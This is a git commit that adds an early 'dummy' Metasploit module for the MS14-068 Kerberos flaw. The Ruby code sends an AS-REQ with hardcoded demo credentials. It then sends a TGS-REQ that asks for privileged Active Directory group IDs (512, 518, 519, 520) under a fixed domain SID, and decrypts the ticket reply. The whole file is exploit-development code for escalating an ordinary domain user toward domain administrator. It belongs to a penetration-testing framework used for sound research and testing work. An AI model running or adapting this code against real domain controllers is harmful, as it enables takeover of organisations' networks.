Add dummy test module

2014-12-17 19:57:10 -06:00 · 2014-12-17 19:57:10 -06:00 · 9a58617387
parent f3f6a64f02
commit 9a58617387
1 changed files with 89 additions and 0 deletions
--- a/modules/auxiliary/admin/kerberos/kerberos_test.rb
+++ b/modules/auxiliary/admin/kerberos/kerberos_test.rb
@ -0,0 +1,89 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 require 'rex'
 class Metasploit4 < Msf::Auxiliary
  #include Msf::Exploit::Remote::Kerberos::Client
 include Msf::Kerberos::Microsoft::Client
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Dummy Kerberos testing module',
      'Description' => %q{
        Dummy Kerberos testing module
      },
      'Author' =>
        [
 					'juan vazquez'
        ],
      'References' =>
        [
          ['MSB', 'MS14-068']
        ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => 'Dec 25 2014'
    ))
  end
  def run
    opts = {
      cname: 'juan',
      sname: 'krbtgt/DEMO.LOCAL',
      realm: 'DEMO.LOCAL',
      key: OpenSSL::Digest.digest('MD4', Rex::Text.to_unicode('juan'))
    }
 		connect(:rhost => datastore['RHOST'])
    print_status("Sending AS-REQ...")
 		res = send_request_as(opts)
 		print_status("#{res.inspect}")
    unless res.msg_type == 11
      print_error("invalid response :(")
      return
    end
    print_good("good answer!")
    print_status("Parsing AS-REP...")
    session_key = extract_session_key(res, opts[:key])
    pp session_key
    logon_time = extract_logon_time(res, opts[:key])
    print_status("logon time: #{logon_time}")
    ticket = res.ticket
    opts.merge!(
      logon_time: logon_time,
      session_key: session_key,
      ticket: ticket,
      group_ids: [513, 512, 520, 518, 519],
      domain_id: 'S-1-5-21-1755879683-3641577184-3486455962'
    )
    print_status("Sending TGS-REQ...")
    res = send_request_tgs(opts)
    unless res.msg_type == 13
      print_error("invalid response :(")
      return
    end
    print_good("Valid TGS-Response")
    pp res
    decrypt_res = res.enc_part.decrypt("AAAABBBBCCCCDDDD", 9)
    enc_kdc_res = Rex::Proto::Kerberos::Model::EncKdcResponse.decode(decrypt_res)
    print_good("Decrypted!")
    pp enc_kdc_res
  end
 end